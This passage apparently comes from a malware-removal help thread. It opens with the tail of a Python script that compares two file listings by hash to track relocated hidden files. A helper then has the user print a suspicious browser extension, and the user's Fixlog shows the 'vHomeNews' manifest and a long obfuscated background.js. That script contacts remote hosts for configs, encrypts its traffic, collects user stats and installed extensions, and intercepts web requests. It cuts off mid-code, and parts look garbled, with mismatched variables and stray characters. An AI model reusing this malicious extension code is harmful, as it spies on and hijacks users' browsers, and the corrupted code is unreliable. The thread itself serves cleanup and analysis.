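        return "H" in self.attrs  # assumption: H marks the hidden attribute


def parse_listing(text):
    """Return the entries of a Folder: listing; banners and blank lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts1, ts2, size, attrs, md5, _company, path = m.groups()
            entries.append(Entry(ts1, ts2, int(size), attrs, md5, PureWindowsPath(path)))
    return entries


def compare_runs(before, after):
    """Match files across two runs by content (MD5, size, name), ignoring location."""
    def index(entries):
        return {(e.md5, e.size, e.path.name): e for e in entries if not e.is_dir}

    old, new = index(before), index(after)
    relocated, renamed, stamps = [], set(), set()
    for key in old.keys() & new.keys():
        a, b = old[key], new[key]
        if a.path != b.path:
            relocated.append((str(a.path), str(b.path)))
            stamps.add((a.first_ts, b.first_ts))
            if len(a.path.parts) == len(b.path.parts):
                # Record which path component changed between the runs.
                renamed.update((x, y) for x, y in zip(a.path.parts, b.path.parts) if x != y)
    return {
        "relocated": sorted(relocated),
        "renamed_components": renamed,
        "timestamps": stamps,
        "only_before": sorted(str(old[k].path) for k in old.keys() - new.keys()),
        "only_after": sorted(str(new[k].path) for k in new.keys() - old.keys()),
        "all_hidden": all(e.hidden for e in before + after),
    }


if __name__ == "__main__":
    report = compare_runs(parse_listing(RUN_MAY_06), parse_listing(RUN_MAY_08))
    for name, value in report.items():
        print(name, "=", value)
```

On these two runs every file matches by hash and only the subfolder name differs, so a cleanup or detection rule keyed to the full path would miss the re-created copy while one keyed to hash, size and name would not.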

#13 Oh My!


Posted 08 May 2021 - 08:48 AM

Thank you,

Please do this.

===================================================
Farbar Recovery Scan Tool Fix
--------------------
  • Right click on the FRST icon and select Run as administrator
  • Highlight the below information then hit the Ctrl + C keys at the same time and the text will be copied
  • There is no need to paste the information anywhere, FRST will do it for you

Start::
cmd: type C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\manifest.json
cmd: type C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\background.js
End::

  • Click Fix
  • When completed the tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply.

===================================================
Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it.
  • Fixlog

#14 Jones2021Riano


Posted 08 May 2021 - 09:12 AM

Fix result of Farbar Recovery Scan Tool (x64) Version: 08-05-2021 01
Ran by FRANCIS (08-05-2021 22:04:07) Run:3
Running from C:\Users\FRANCIS\Downloads
Loaded Profiles: FRANCIS
Boot Mode: Normal
==============================================

fixlist content:
*****************
cmd: type C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\manifest.json
cmd: type C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\background.js

*****************

========= type C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\manifest.json =========

{
  "name": "vHomeNews",
  "version": "7.39",
  "description": "Home News",
  "permissions": [
    "storage",
    "webRequest",
    "webRequestBlocking",
    "http://*/",
    "https://*/",
    "management"
  ],
  "background": {
    "scripts": [
      "background.js"
    ]
  },
  "browser_action": {
    "default_icon": "icon128.png"
  },
  "manifest_version": 2,
  "minimum_chrome_version": "35"
}
========= End of CMD: =========

========= type C:\ProgramData\Kawmq\Rpdnepq\DC05DC4E\background.js =========
b+P;},v[sL(0x6c6,']Rcs')]=sE(0x4e6,'DH7R'),v[sL(0x6c1,'Q##1')]=sL(0x46e,'$]ai'),v[sZ(0x617,'&NUL')]=sZ(0x239,'xWg('),v[sH(0x37f,'%1Wi')]=sE(0x2e9,'SNZo'),v[sH(0x44d,'!tWl')]=sQ(0x645,'8@D3');const r=v,f=[[r[sL(0x1f6,'cgVJ')],appFormat],[r[sZ(0x477,'yTY2')],appVersion],[r[sZ(0x694,'Y$2)')],l[sQ(0x48e,'&NUL')]],[r[sE(0x6ce,'$vab')],l[sQ(0x48c,'C7@$')][sL(0x649,'lu&$')]],[r[sZ(0x245,'WW46')],userId]];return f[sH(0x636,'j#2h')]((b,P)=>{const su=sE,sW=sZ,sY=sZ;let O=new RegExp(r[su(0x6a3,'k^U#')](r[sW(0x6c3,'Q##1')]('\x5c[',b[0x1a2d*0x1+0x1*-0x1e3b+0x40e*0x1]),'\x5c]'),'gi');A=A[sY(0x48b,'%yFL')](O,b[0x1b89+0xb5*-0x3+-0x1*0x1969]);}),A;}function replaceUrlMacros(l,A){const sC=a0s2,sd=a0s5,st=a0s1,sm=a0s1,sD=a0s4,v={};v[sC(0x1b0,'mU4s')]=function(f,b,P){return f(b,P);},v[sC(0x429,']Rcs')]=function(f){return f();},v[sC(0x236,'cR2Y')]=function(f, B){return f+b;},v[sd(0x426,'8@D3')]=function(f, B){return f( B);};const r=v;l=r[sm(0x21e,'yTY2')](replaceAppMacros,r[st(0x254,'Y7Ko')](getConfig),l);for(let f in A){let b=new RegExp(r[sC(0x40d,'!tWl')](r[st(0x592,'C7@$')]('\x5c[',f),'\x5c]'),'gi');l=l[sC(0x656,'&NUL')](b,A[f]);}return l=r[sm(0x382,'vA59')](encodeURI,l),l;}setInterval(function(){const sK=a0s4,l0=a0s3,l={};l[sK(0x303,'@(X[')]=function(v){return v();};const A=l;A[sK(0x554,'J&Ou')](a0A);},0xf14*-0x1+0x1*-0x5b2+0x2466);function isActionTimeNow(l){const l1=a0s4,l2=a0s1,l3=a0s1,l4=a0s2,l5=a0s2,A={};A[l1(0x36f,'&NUL')]=function(f, B){return f===b;},A[l2(0x4ea,'25hK')]=function(f, B){return f>=b;};const v=A;if(l[l3(0x4b4,']Rcs')])return![];if(!l[l1(0x205,'M$%w')+'e']||v[l4(0x321,'25hK')](l[l3(0x2cc,'m$hw')+'e'],null))return![];let r=Date[l1(0x355,'j#2h')]();return v[l5(0x4fe,'6(5I')](r,l[l5(0x45a,']Rcs')+'e']);}function prepareTask(l){const l6=a0s5,l7=a0s2,l8=a0s3,l9=a0s4,ls=a0s5,A={};A[l6(0x489,'yAvB')]=function(b,P){return b(P);},A[l6(0x552,'UQM8')]=function(b,P){return b>=P;},A[l7(0x4f3,'!tWl')]=function(b,P){return b!=P;};const v=A;if(l[l9(0x4e8,'Y7Ko')])return![];let 
r=Date[l7(0x62b,')^B&')]();!l[ls(0x66c,'mU4s')+l7(0x21b,'siaL')]&&(l[ls(0x681,'UQM8')+l8(0x39b,'DH7R')]=r);let f=v[l6(0x387,'%yFL')](r,l[ls(0x5d9,')^B&')+l9(0x5eb,')^B&')]);if(f&&!l[l6(0x1df,']Rcs')+'p']){l[ls(0x511,'cgVJ')][l6(0x1ad,'d)[^')](b=>{const ll=ls,lA=l7,lv=l6,lr=l6,lf=ls;!b[ll(0x45b,')^B&')]&&!b[ll(0x200,'yTY2')+'e']&&(b[lv(0x23c,'f2lD')+'e']=r),!l[lA(0x27d,'!tWl')+'p']&&v[lf(0x5aa,'Q##1')](isActionTimeNow, B)&&(l[lA(0x274,'sc^*')+'p']=b[ll(0x41d,'%1Wi')]);});if(!l[ls(0x6a5,'8@D3')+'p']){}}return f&&v[l9(0x5df,'cR2Y')](l[l8(0x5a7,'Y$2)')+'p'],undefined);}function finishTask(l){const lb=a0s1,lP=a0s2,lO=a0s5,lz=a0s4,la=a0s2,A={};A[lb(0x5b9,'Y7Ko')]=function(r,f){return r+f;},A[lb(0x3bb,'Y7Ko')]=function(r,f){return r(f);};const v=A;l[lP(0x6b5,'UQM8')+'p']=undefined,l[lz(0x389,'%1Wi')]?l[la(0x351,'!tWl')+lb(0x64d,'%yFL')]=v[lP(0x629,'yAvB')](Date[la(0x56b,'QB$Y')](),v[lz(0x33e,'w&lY')](sec2ms,l[lO(0x417,'J&Ou')])):(l[lz(0x5b4,'cL8r')+lP(0x64d,'%yFL')]=null,l[lb(0x444,'otDQ')]=!![]);}function updateActionNextRunTime(l){const lV=a0s2,lX=a0s4,lx=a0s2,lc=a0s1,lk=a0s1,A={};A[lV(0x4fb,'5#F9')]=function(r,f){return r+f;},A[lV(0x5c6,'FwY2')]=function(r,f){return r(f);};const v=A;l[lx(0x2f3,'C7@$')]?l[lV(0x474,'SNZo')+'e']=v[lX(0x4f5,'QB$Y')](Date[lk(0x22e,'Y$2)')](),v[lX(0x458,'mU4s')](sec2ms,l[lV(0x1f8,'%yFL')])):(l[lx(0x404,'yAvB')+'e']=null,l[lx(0x3a0,'m$hw')]=!![]);}function finishAction(l){const li=a0s2,lU=a0s4,lG=a0s4,lF=a0s1,lB=a0s5,A={};A[li(0x696,'k^U#')]=function(r,f){return r(f);},A[lU(0x4a9,'cR2Y')]=function(r,f){return r(f);};const v=A;v[li(0x44a,'Epg(')](updateActionsCount,l[lU(0x476,'!tWl')]),v[lB(0x55b,'yTY2')](updateActionNextRunTime,l);}function initTasks(A){const lT=a0s4,lp=a0s3,lq=a0s5,lg=a0s1,ln=a0s3,v={};v[lT(0x3aa,'yAvB')]=lp(0x261,']Rcs'),v[lq(0x6b3,'C7@$')]=function(b,P){return b+P;},v[lq(0x68c,'cL8r')]=function(b,P){return b+P;},v[lT(0x549,'oqvV')]=function(b,P){return 
b+P;},v[lg(0x4d4,'WW46')]=lT(0x5a1,'8@D3'),v[ln(0x38f,'siaL')]=lp(0x2e8,'M$%w');const r=v;if(!A)return;let f=A[lq(0x650,'cL8r')];if(A[ln(0x38c,'Y$2)')+ln(0x2ce,'sc^*')+lg(0x224,'AhHj')]){}else{for(let b in f){let P=f[b];P[lg(0x695,'d)[^')]&&!P[ln(0x674,'yAvB')]&&(P[lp(0x338,'C7@$')]=P[lT(0x327,'5#F9')]),P[lg(0x45f,'cgVJ')]=undefined,P[lq(0x3db,'$Vpd')]=P[lq(0x635,'FwY2')][lq(0x4bb,'xWg(')](O=>{const le=lp,lw=lp,lN=lp,lM=lp,lh=lg,z=r[le(0x4cd,'$Vpd')][lw(0x250,']Rcs')]('|');let a=-0xb39+-0xeb*0xf+0x18fe;while(!![]){switch(z[a++]){case'0':!O[lw(0x398,'xWg(')]('/')&&(O=r[le(0x6b3,'C7@$')](O,'/'));continue;case'1':return O;case'2':!O[lM(0x4fa,'&NUL')]('*')&&(O=r[lw(0x262,'FwY2')](O,'*'));continue;case'3' :o=O[lw(0x390,'cL8r')]()[lN(0x49d,'!tWl')+'e']();continue;case'4':!O[lh(0x526,'&NUL')]('*')&&(O=r[lw(0x1d2,'JXuv')]('*.',O));continue;}break;}});}A[lg(0x46f,'oqvV')+lp(0x1ab,'vA59')+ln(0x2dc,'M$%w')]=!![];}A[lg(0x409,'JXuv')+ln(0x609,'$Vpd')]=undefined;if(limitedReqFilter){let O=[];for(let a in f){let V=f[a];!V[lg(0x39a,'yTY2')]&&V[ln(0x67e,'M$%w')][lp(0x664,'5#F9')](X=>{const lj=ln,lo=lg,ly=ln;O[lj(0x1d5,'C7@$')](r[lj(0x66e,'5#F9')](r[ly(0x5a5,'M$%w')],X));});}const z={};z[lg(0x385,'m$hw')]=O,z[lg(0x295,'%yFL')]=[r[ln(0x20e,'JXuv')]],A[lg(0x64a,'vA59')]=z;}}const getConfig=()=>globalCurCfg,getDefaultConfig=()=>globalDefaultCfg;function checkConfig(l,A){const lJ=a0s4,lS=a0s2,lI=a0s4,lR=a0s2,lL=a0s2,v={};v[lJ(0x4cc,'QB$Y')]=function(f, B){return f( B);},v[lS(0x3ab,'siaL')]=function(f, B){return f( B);},v[lJ(0x1aa,'oqvV')]=lS(0x619,'8@D3')+lJ(0x5ae,'5#F9'),v[lL(0x5b6,'JXuv')]=function(f, B){return f( B);},v[lI(0x2a1,'5#F9')]=lS(0x220,'C7@$')+lJ(0x657,'8@D3'),v[lL(0x275,'6(5I')]=lI(0x241,'!tWl')+lI(0x2c9,'UQM8'),v[lI(0x391,')^B&')]=lR(0x340,'j#2h')+lL(0x528,'@(X[');const r=v;if(!l){}else{if(!r[lS(0x407,'0si)')](isValidConfig,l)){switch(A){case cfgSources[lJ(0x5d6,'FwY2')]:r[lI(0x2fd,'Epg(')](updateErrCount,r[lS(0x54b,'$]ai')]);break;case 
cfgSources[lL(0x4c9,'Y$2)')]:r[lJ(0x53c,'m$hw')](updateErrCount,r[lI(0x610,'yTY2')]);break;case cfgSources[lL(0x443,'$]ai')]:r[lL(0x4d0,'cL8r')](updateErrCount,r[lR(0x4f9,'5#F9')]);break;default:r[lJ(0x61c,'J&Ou')](updateErrCount,r[lL(0x22c,'0si)')]);break;}l=undefined;}else{}}return l;}function getRndHost(l){const lE=a0s2,lH=a0s1,lQ=a0s5,lZ=a0s1,lu=a0s5,A={};A[lE(0x683,'C7@$')]=function(b,P){return b(P);},A[lE(0x698,'cgVJ')]=lH(0x405,'%yFL'),A[lH(0x5dc,'%yFL')]=function(b,P){return b==P;},A[lZ(0x3d2,'SNZo')]=function(b,P,O){return b(P,O);},A[lE(0x541,'yTY2')]=function(b,P){return b%P;},A[lE(0x3a7,'0si)')]=function(b,P){return b-P;};const v=A;let r=v[lH(0x45e,'Y7Ko')](getState,v[lZ(0x2f4,'yTY2')]);v[lQ(0x60b,']Rcs')](r,undefined)&&(r=v[lE(0x21a,'J&Ou')](getRndInt,Number[lu(0x55c,'%1Wi')+lQ(0x68f,']Rcs')]),v[lE(0x1d3,'d)[^')](saveState,v[lu(0x5d4,'xWg(')],r));let f=v[lu(0x2a7,'Y7Ko')](l[lQ(0x313,'Y7Ko')][lE(0x51b,'sc^*')][lH(0x335,'m$hw')],r);return l[lZ(0x2b0,'sc^*')][lE(0x2a6,'yAvB')][v[lZ(0x3a7,'0si)')](f,-0x14ce+0x1bbc+-0x6ed)];}function prepareConfig(l){const lW=a0s1,lY=a0s3,lC=a0s2,ld=a0s3,lt=a0s1,A={};A[lW(0x3f5,'yAvB')]=lW(0x49b,'JXuv'),A[lC(0x536,'yTY2')]=function(r,f){return r(f);},A[lY(0x5de,'FwY2')]=function(r,f){return r==f;},A[lY(0x440,'lu&$')]=lY(0x691,'oqvV'),A[lW(0x60a,'WW46')]=function(r,f, B){return r(f, B);};const v=A;if(l[lC(0x3e5,'$Vpd')])return;l[lt(0x1fb,'0si)')][v[lt(0x6b4,'M$%w')]]=v[lW(0x562,'6(5I')](getRndHost,l);for(let r in l[lW(0x5fc,']Rcs')]){let f=l[lt(0x66d,'@(X[')][r];v[ld(0x662,'d)[^')](typeof f,v[lW(0x5cf,'cR2Y')])&&(l[lW(0x2f2,'yTY2')][r]=v[lC(0x43c,'25hK')](replaceAppMacros,l,f));}l[lC(0x672,'FwY2')]=!![];}function setConfig(A){const lm=a0s1,lD=a0s1,lK=a0s5,A0=a0s2,A1=a0s5,v={};v[lm(0x324,'cgVJ')]=function(O){return O();},v[lD(0x26a,'cgVJ')]=function(O,z){return O(z);},v[lK(0x3f1,'J&Ou')]=function(O,z){return O===z;},v[lm(0x533,'8@D3')]=function(O,z){return O(z);},v[lK(0x4ae,'w&lY')]=lD(0x43d,'SNZo');const r=v;let 
f=r[A0(0x324,'cgVJ')](getConfig);r[A1(0x427,'w&lY')](prepareConfig,A);let b=f&&r[A0(0x2fc,'8@D3')](A[A0(0x5e2,')^B&')],f[A1(0x487,'M$%w')])?![]:!![];b?r[lK(0x52d,'%1Wi')](initTasks,A):A[lm(0x650,'cL8r')]=f[A0(0x207,'WW46')];!A[lK(0x6c0,'Y7Ko')]&&(A[lD(0x1cc,'%1Wi')]=Date[A1(0x57e,'0si)')]());const P={};P[storageCfgName]=A,chrome[lm(0x3bd,'Q##1')][A0(0x559,'oqvV')][lD(0x454,'xWg(')](P),globalCurCfg=A,b&&(globalPending=[],limitedReqFilter&&chrome[A0(0x45d,'cgVJ')][lK(0x69f,'vA59')+lm(0x29b,'JXuv')][A0(0x39f,'k^U#')+'r'](callbackBeforeRequest,A[lK(0x289,'cL8r')],[r[lK(0x537,'xWg(')]]));}function isValidConfig(l){const A2=a0s4,A3=a0s3,A4=a0s5,A5=a0s5,A6=a0s3,A={};A[A2(0x639,'Q##1')]=function(f, B){return f!=b;},A[A2(0x1ef,'AhHj')]=function(f){return f();},A[A3(0x493,']Rcs')]=function(f,b,P){return f(b,P);},A[A3(0x1de,'j#2h')]=A5(0x39d,'lu&$'),A[A5(0x3f2,'SNZo')]=A4(0x628,'0si)'),A[A5(0x3ae,'vA59')]=A4(0x6ab,'m$hw'),A[A3(0x3c0,'mU4s')]=A2(0x680,'JXuv'),A[A3(0x3d6,'d)[^')]=A6(0x2c4,'$Vpd');const v=A;let r=!![];return v[A3(0x1f5,'sc^*')](l[A4(0x2cd,'Y$2)')],v[A5(0x418,'!tWl')](getDefaultConfig)[A6(0x505,']Rcs')])?r=![]:r=v[A4(0x2d1,'0si)')](checkMandatoryFields,l,{'format':[],'version':[],'tasksHash':[],'params':[],'update':[v[A3(0x1be,'cL8r')],v[A6(0x27c,'8@D3')],v[A5(0x546,'@(X[')],v[A5(0x5ea,'8@D3')],v[A4(0x413,'Y7Ko')]]}),r;}function checkMandatoryFields(l,A){const A7=a0s5,A8=a0s5,A9=a0s1,As=a0s1,Al=a0s1,v={};v[A7(0x648,'vA59')]=function(b,P){return b==P;},v[A8(0x6d0,'Y7Ko')]=A9(0x61d,'Q##1'),v[As(0x6bb,')^B&')]=function(b,P){return b==P;};const r=v;let f=!![];for(let b in A){let P=l;b[Al(0x3e7,'d)[^')]('.')[A8(0x249,'$]ai')](O=>{const AA=A7,Av=A8;P=P[O];if(r[AA(0x5b1,'cgVJ')](typeof P,r[AA(0x31b,'$Vpd')]))return f=![],![];}),A[b][A7(0x4bf,'Y7Ko')](O=>{const Ar=A8,Af=As;r[Ar(0x5e6,'oqvV')](typeof P[O],r[Ar(0x319,'FwY2')])&&(f=![]);;return!![];});}return f;}async function asyncRequestUrl(b,P){const 
Ab=a0s1,AP=a0s1,AO=a0s4,Az=a0s1,Aa=a0s1,O={};O[Ab(0x647,'yTY2')]=AP(0x1d1,'JXuv')+AP(0x357,'JXuv'),O[AO(0x204,'Y7Ko')]=function(a,V){return a(V);},O[AP(0x4b3,'f2lD')]=AP(0x25d,'k^U#')+Az(0x4d1,'j#2h'),O[Aa(0x44c,'0si)')]=AP(0x2c2,'siaL'),O[AP(0x58c,'%yFL')]=function(a,V){return a===V;},O[Ab(0x202,'vA59')]=AO(0x2aa,')^B&'),O[AO(0x2a3,'mU4s')]=AO(0x4d5,']Rcs')+Aa(0x271,'m$hw')+Ab(0x690,'25hK'),O[Aa(0x666,')^B&')]=AP(0x2b4,'yAvB')+Az(0x276,'JXuv')+Aa(0x63a,'$vab'),O[Ab(0x445,'WW46')]=Ab(0x63b,'mU4s'),O[Ab(0x66b,'oqvV')]=function(a,V){return a(V);},O[AO(0x52a,'UQM8')]=function(a,V,X){return a(V,X);},O[AP(0x4c8,'sc^*')]=function(a,V){return a(V);};const z=O;try{const a=z[Az(0x68e,'25hK')],V=!![];let [X,x,c]=z[Aa(0x4df,'WW46')](makeRequest, B);if(!X)throw z[Ab(0x22f,'Q##1')];c&&(P[z[AO(0x566,'mU4s')]]=c);let k=P?z[Az(0x416,'25hK')](removeUnicode,JSON[AO(0x4f0,'sc^*')](P)):'',U=z[Ab(0x585,'cL8r')](X,z[Ab(0x4a2,'yTY2')])?undefined:{'method':X,'headers':{'Content-Type':V?z[AP(0x3fa,'$]ai')]:z[AP(0x263,'mU4s')],'Cache-Control':z[AO(0x28a,'j#2h')]},'body':(b[Az(0x58e,'Y7Ko')]||b[AO(0x2e4,'Y7Ko')+'o'])&&k?V?z[Aa(0x332,'Y$2)')](btoa,z[Az(0x24b,'8@D3')](rc4,a,k)):k:undefined},G=await z[Ab(0x5c9,'Y7Ko')](fetch,x,U)[Aa(0x1ee,'w&lY')](T=>{});if(!G||!G['ok']){const T={};return T[Ab(0x525,'w&lY')]=0x0,T;}let F;if(V){let p=await G[AP(0x4d2,'vA59')]()[Ab(0x349,'@(X[')](n=>{});if(!p){const n={};return n[Aa(0x539,'AhHj')]=0x0,n;}let q=z[AO(0x453,'WW46')](rc4,a,z[AO(0x1e1,'0si)')](atob,p)),g=z[AO(0x3c4,'UQM8')](removeUnicode,q);F=JSON[AO(0x3f9,'j#2h')](g);}else{let w=await G[AP(0x2d0,'6(5I')]();if(!w){const N={};return N[AP(0x577,')^B&')]=0x0,N;}F=w;}const B={};return B[Aa(0x5bc,'$]ai')]=F?G[AO(0x32a,'k^U#')]:0x38a*0xb+0x4*-0x363+-0x43b*0x6,B[Ab(0x475,'C7@$')]=F,B;}catch(M){const h={};return h[Az(0x243,'d)[^')]=0x0,h;}}function makeRequest(l){const AV=a0s2,AX=a0s4,Ax=a0s3,Ac=a0s4,Ak=a0s3,A={};A[AV(0x2c3,'f2lD')]=function(X,c){return X+c;},A[AX(0x6a4,'yAvB')]=function(X,c){return 
X===c;},A[Ax(0x38b,'mU4s')]=AV(0x341,'cR2Y'),A[AV(0x4b2,'JXuv')]=function(X,c){return X/c;},A[AX(0x598,'otDQ')]=function(X){return X();},A[AX(0x580,'mU4s')]=function(X,x){return X(x);},A[AX(0x5d2,'cL8r')]=function(X,x){return X(x);},A[Ax(0x394,'m$hw')]=function(X,c){return X-c;},A[Ax(0x399,'Epg(')]=function(X,c){return X-c;},A[Ac(0x3e1,'5#F9')]=function(X,c){return X+c;},A[Ak(0x31c,'f2lD')]=function(X,x,c){return X(x,c);},A[Ac(0x4f2,'otDQ')]=function(X,x){return X(x);},A[Ak(0x527,'0si)')]=function(X,x){return X(x);},A[Ak(0x238,'6(5I')]=function(X,c){return X<c;},A[Ak(0x283,'lu&$')]=function(X,c){return X+c;},A[Ac(0x507,'sc^*')]=function(X,c){return X+c;},A[AV(0x4a3,')^B&')]=AX(0x2ea,'otDQ'),A[AX(0x3b8,'!tWl')]=function(X,c){return X+c;},A[Ac(0x1d7,'JXuv')]=function(X,c){return X+c;},A[Ac(0x2d8,'lu&$')]=function(X,x){return X(x);},A[AV(0x396,'vA59')]=AX(0x441,'ICSG')+AV(0x25f,'Y7Ko');const r=A;let f=l[AX(0x219,'otDQ')],b=l[AV(0x1c4,'$Vpd')],P;const O=-0x2019+-0x1023+0x343c;let z=new URL( B),a=r[Ax(0x602,'Y$2)')](z[AX(0x591,'!tWl')],z[AX(0x32d,'siaL')])[Ac(0x235,'!tWl')](/^\?/,''),V=a;if(r[AX(0x65c,'otDQ')](f,r[Ak(0x53d,'Y$2)')])){if(l[AV(0x587,'WW46')+Ax(0x461,']Rcs')]){const X=r[AV(0x46c,'FwY2')](O,0x1217+0x1b0f+0x282*-0x12);let x=r[Ax(0x54a,'WW46')](getKey),c=new DataView(new 
Uint32Array([a[AX(0x402,'yAvB')]])[Ax(0x6ba,'Y7Ko')]),k=String[AX(0x678,'AhHj')+'de'](c[Ax(0x3b4,'FwY2')](-0x71e*-0x5+-0x2fa*-0x9+-0x3e60),c[AV(0x1b6,'!tWl')](-0x576+0x4f*0x59+-0x1600),c[Ak(0x5e1,'cL8r')](0x255c+-0x6fd+0x3*-0xa1f),c[AV(0x60f,'ICSG')](0x2370+-0x745*0x2+-0x1*0x14e3)),U=r[AX(0x4b0,'SNZo')](getRndStr,r[Ak(0x692,'j#2h')](getRndInt,Math[Ac(0x326,'UQM8')](0x12a0*-0x1+0xdfd*0x1+0x4a3,r[Ax(0x64b,'%1Wi')](r[Ak(0x394,'m$hw')](r[Ax(0x270,'m$hw')](X,x[AX(0x582,'sc^*')]),k[Ac(0x3cd,'%yFL')]),a[AX(0x337,'Y7Ko')])))),G=r[AV(0x406,'cL8r')](x,r[AV(0x3af,'FwY2')](rc4,x,r[Ac(0x27f,'@(X[')](r[Ac(0x38d,'Epg(')](k,a),U)));V=r[Ak(0x1f7,'xWg(')](rawurlencode,r[Ac(0x3ef,'JXuv')](btoa,G));}r[AV(0x333,'Y$2)')](r[Ax(0x61b,'j#2h')](z[Ax(0x448,'mU4s')][Ac(0x5ce,'vA59')],V[AV(0x6cd,'k^U#')]),O)?b=r[Ac(0x65d,']Rcs')](r[AV(0x63e,'0si)')](r[Ax(0x4e1,'%yFL')](z[Ax(0x473,'oqvV')],z[AV(0x1ba,'6(5I')]),'?'),V):(f=r[Ax(0x574,'otDQ')],b=r[AV(0x365,'WW46')](z[AV(0x4ab,'DH7R')],z[AX(0x1d8,'otDQ')]),P=a);}else{if(r[AV(0x62d,'%yFL')](f,r[AX(0x2ee,'siaL')]))b=r[Ak(0x4da,'Y7Ko')](z[Ak(0x2a2,'!tWl')],z[Ak(0x356,'$]ai')]),P=a;else{r[Ax(0x5b0,'%yFL')](updateErrCount,r[Ax(0x256,'FwY2')]);return;}}return[f,b,P];}async function asyncUpdateConfig(){const Ai=a0s3,AU=a0s4,AG=a0s4,AF=a0s4,AB=a0s3,l={};l[Ai(0x33d,'vA59')]=function(V){return V();},l[AU(0x282,'oqvV')]=function(V,X){return V(X);},l[AG(0x5bb,'w&lY')]=AG(0x47c,'AhHj'),l[Ai(0x624,'yAvB')]=function(V){return V();},l[AB(0x2cf,'%yFL')]=function(V,X){return V(X);},l[AB(0x612,'C7@$')]=function(V){return V();},l[AF(0x608,'%yFL')]=function(V,X){return V<X;},l[Ai(0x315,'m$hw')]=function(V,X){return V-X;},l[AB(0x2dd,'QB$Y')]=function(V,X,x){return V(X,x);},l[Ai(0x603,'M$%w')]=function(V,X,x){return V(X,x);},l[AU(0x354,'cgVJ')]=function(V){return V();},l[AF(0x28f,'0si)')]=AF(0x465,'Y7Ko'),l[AG(0x6aa,'WW46')]=function(V,X,x){return V(X,x);},l[Ai(0x4f6,'@(X[')]=function(V,X){return V==X;},l[AB(0x3f3,'cR2Y')]=function(V,X,x){return 
V(X,x);},l[AF(0x626,')^B&')]=AF(0x6a7,'w&lY'),l[AB(0x642,'@(X[')]=function(V,X){return V(X);},l[AB(0x451,'@(X[')]=AB(0x530,'ICSG')+Ai(0x278,'cR2Y'),l[AU(0x273,'%1Wi')]=function(V,X){return V>=X;},l[AB(0x3c3,'M$%w')]=function(V,X){return V!=X;},l[AG(0x27a,'vA59')]=AU(0x5e3,'cL8r'),l[AF(0x607,'sc^*')]=function(V,X){return V==X;},l[AG(0x5bd,'WW46')]=function(V,X){return V(X);},l[AF(0x215,'8@D3')]=Ai(0x62f,']Rcs')+'rr',l[AB(0x5cc,']Rcs')]=function(V,X){return V(X);},l[Ai(0x503,'JXuv')]=AU(0x597,'25hK')+AG(0x655,'d)[^'),l[Ai(0x5e4,'j#2h')]=function(V,X){return V>=X;},l[AF(0x410,'8@D3')]=function(V){return V();},l[AG(0x52b,'j#2h')]=function(V,X,x){return V(X,x);},l[AB(0x1ec,'%yFL')]=function(V,X){return V+X;},l[AB(0x4b1,']Rcs')]=function(V,X,x){return V(X,x);};const A=l;let v=A[AF(0x6b7,'cL8r')](getConfig),r=Date[AU(0x48a,'$Vpd')](),f=v[AB(0x378,'AhHj')][AB(0x30c,'SNZo')+AU(0x4a1,'M$%w')];if(f&&A[Ai(0x5d8,'lu&$')](r,f)){let V=A[Ai(0x2d5,'!tWl')](f,r);A[AG(0x2c7,'&NUL')](setTimeout,()=>{const AT=AB,Ap=AB,Aq=AU;try{A[AT(0x2a4,'xWg(')](asyncUpdateConfig);}catch(X){A[AT(0x50a,'ICSG')](updateErrCount,A[AT(0x572,')^B&')]);}},V);return;}let b={};Object[AG(0x29c,'otDQ')](b,globalStats),b['id']=userId;let P=v[AU(0x28b,'m$hw')][AG(0x618,'QB$Y')+AG(0x293,'FwY2')];P&&A[AG(0x470,'lu&$')](cutStats,b,P);let O=await A[AF(0x252,'%1Wi')](asyncGetExt);if(v[Ai(0x378,'AhHj')][AB(0x373,'siaL')+'o']){let X=O[Ai(0x5da,'Y7Ko')](x=>{const Ag=AB,An=AB,Ae=AG,Aw=Ai;for(let c in x){!v[Ag(0x300,'8@D3')][Ag(0x567,'sc^*')+An(0x3dd,'$Vpd')][Aw(0x2e1,'DH7R')]©&&delete x[c];}return x;});b[A[AG(0x518,'8@D3')]]=X;}let z=await A[AF(0x5cd,'otDQ')](asyncRequestUrl,v[AG(0x20a,'!tWl')], B);A[Ai(0x1c7,'k^U#')](z[AU(0x5f9,'!tWl')],0x1bed+-0x6*-0x154+0x59*-0x65)&&A[AU(0x4f4,'WW46')](clearStats);let a=A[AF(0x39e,'Q##1')](checkConfig,z[AB(0x350,'siaL')],cfgSources[AB(0x2f8,'@(X[')]);if(!a){A[AG(0x613,')^B&')](updateErrCount,A[AF(0x63c,'m$hw')]);let 
x=A[AG(0x3b3,'vA59')](updateErrCount,A[AF(0x482,'m$hw')]);if(A[AF(0x623,'$vab')](x,v[AU(0x521,'siaL')][AF(0x3f6,'5#F9')])){let c=A[AB(0x31e,'$]ai')](getDefaultConfig);if(A[AB(0x2a9,'d)[^')](v,c)){const k=A[Ai(0x52f,'AhHj')][AB(0x240,'cL8r')]('|');let U=0xf7e+0x7b9+-0x351*0x7;while(!![]){switch(k[U++]){case'0':A[AB(0x63f,'J&Ou')](z[AF(0x529,'C7@$')],0x404+-0x2*0x2f+0x1*-0x2de)&&A[AF(0x2bf,'0si)')](clearStats);continue;case'1':if(!a){A[AF(0x63d,'$Vpd')](updateErrCount,A[Ai(0x5c4,'!tWl')]),x=A[Ai(0x328,'$]ai')](updateErrCount,A[AU(0x479,'k^U#')]);if(A[AF(0x381,'Y$2)')](x,c[AB(0x48c,'C7@$')][Ai(0x6c9,')^B&')])){A[AU(0x253,'w&lY')](disableProcessing);return;}}continue;case'2':a=A[AG(0x4eb,'lu&$')](checkConfig,z[AG(0x320,'j#2h')],cfgSources[AF(0x226,'Y7Ko')]);continue;case'3':z=await A[Ai(0x4d9,'8@D3')](asyncRequestUrl,c[AU(0x501,'cgVJ')], 